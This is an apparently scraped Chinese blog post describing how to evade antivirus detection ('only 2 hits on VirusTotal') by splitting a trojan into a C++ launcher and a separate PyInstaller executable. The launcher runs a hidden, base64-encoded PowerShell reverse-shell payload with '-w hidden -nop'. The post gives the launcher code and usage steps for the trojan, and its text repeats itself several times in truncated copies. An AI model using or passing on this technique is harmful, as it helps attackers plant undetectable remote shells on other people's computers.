首页 > 系统相关> > C++Powershell Python 联动实现VirusTotal只查出2个

C++Powershell Python 联动实现VirusTotal只查出2个

2022-01-19 18:35:06 作者：互联网

`C++Powershell Python3 联动实现VirusTotal只查出2个`

效果如下:

->因为调用了`powershell`,所以会这样.大家可以自由发挥

免杀思路:

1.准备两个文件执行文件,被执行文件（类似于分离免杀）

2.让执行文件调用被执行文件

注意：执行文件（run_main.exe）必须足够强大，作者这次使用pyinstaller的文件

代码实现:

预备代码:

这里使用反弹shell网站生成Powershell #3 Base64的编码部分

首先是`执行文件.cpp`:

这里供出:

#include <stdio.h>
#include <stdlib.h> 
int main()
{
	system("RUN_MAIN.exe + 预备代码 + -w hidden -nop");
	//这里隐藏 大家可以自己写一个run_main.exe 
        return 0;
}

PS:

RUN_MAIN.exe下载

使用方法

1.调试并生成exe

2.木马运行时请必须与RUN_MAIN.exe在同一目录

3.因为pyinstaller的文件无论是什么都会报毒，希望大家可以自己编写

C++Powershell Python 联动实现VirusTotal只查出2个

`C++Powershell Python3 联动实现VirusTotal只查出2个`

效果如下:

->因为调用了`powershell`,所以会这样.大家可以自由发挥

免杀思路:

1.准备两个文件执行文件,被执行文件（类似于分离免杀）

2.让执行文件调用被执行文件

注意：执行文件（`run_main.exe`）必须足够强大，作者这次使用pyinstaller的文件

代码实现:

首先是`执行文件.cpp`:

使用方法

相关资源:

C++Powershell Python 联动实现VirusTotal只查出2个

C++Powershell Python3 联动实现VirusTotal只查出2个

效果如下:

->因为调用了powershell,所以会这样.大家可以自由发挥

免杀思路:

1.准备两个文件 执行文件,被执行文件 （类似于分离免杀）

2.让执行文件调用被执行文件

注意：执行文件（run_main.exe）必须足够强大，作者这次使用pyinstaller的文件

代码实现:

首先是执行文件.cpp:

使用方法

相关资源:

`C++Powershell Python3 联动实现VirusTotal只查出2个`

->因为调用了`powershell`,所以会这样.大家可以自由发挥

1.准备两个文件执行文件,被执行文件（类似于分离免杀）

注意：执行文件（`run_main.exe`）必须足够强大，作者这次使用pyinstaller的文件

首先是`执行文件.cpp`: